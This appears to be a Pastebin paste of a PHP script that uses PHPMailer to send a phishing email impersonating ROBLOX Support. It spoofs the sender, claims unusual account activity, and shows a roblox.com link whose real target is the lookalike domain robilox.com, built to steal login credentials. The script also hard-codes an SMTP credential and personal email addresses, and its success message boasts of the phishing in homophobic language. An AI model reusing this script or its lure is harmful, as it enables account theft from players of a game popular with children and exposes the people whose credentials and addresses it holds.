Advertisement
Guest User

Untitled

a guest
Jul 17th, 2016
813
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.53 KB | None | 0 0
  1. <?php
  2. require 'phpmailer/PHPMailerAutoload.php';
  3. $mail = new PHPMailer;
  4. $mail->SMTPDebug = 2;
  5. $mail->SMTPAuth = true;
  6. $mail->SMTPSecure = 'ssl';
  7. $mail->Host = "smtp.sparkpostmail.com";
  8. $mail->Port = 587;
  9. $mail->Username = "SMTP_Injection";
  10. $mail->Password = "3e465f6f6a544899abac2fa545a9dede759bfdd0";
  11. $mail->setFrom('info@roblox.com', 'ROBLOX Support');
  12. $mail->AddReplyTo('mehroblox@gmail.com', 'ROBLOX Support');
  13. $mail->addAddress('zexomic@gmail.com', 'ROBLOX User');
  14. $mail->Subject = 'ROBLOX Support Ticket 2749404 - Unusual Activity Detected';
  15. $mail->IsHTML(true);
  16. $mail->Body = '<img alt = "" src = "http://i.imgur.com/kAhj9Sd.png"/>
  17. <body style="color:#2b2e2f;font-family:Verdana,sans-serif;font-size:14px;line-height:22px;margin:15px 0">Dear Citya,<br><br>We would like to notify you that we have noticed some very unusual activity on your account and suspect that someone else may have accessed it.<br><br>To prevent your account from being locked due to this please use the link below to verify your account login.<br><br><a href="https://www.robilox.com/RobloxVerify.aspx?Mode=emailOnly&Ticket=ada902db-7985-ccc6-b0e3-6826e5ea99a1" target="_blank">https://www.roblox.com/RobloxVerify.aspx?Mode=emailOnly&Ticket=6c62d9d3-b644-4a2c-8402-d2b8c2d77913</a><br><br>BLOX On!<br><p>Customer Service<br>ROBLOX<br>https://en.help.roblox.com/</p></body>
  18.  
  19. <img alt="" src = "http://i.imgur.com/djlTYEA.png"/>';
  20.  
  21. if (!$mail->send()) {
  22. echo "UR SHIT BROKE BRO: " . $mail->ErrorInfo;
  23. } else {
  24. echo "GG BRO U PHSIHED THAT QUEER!!!";
  25. }
  26. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement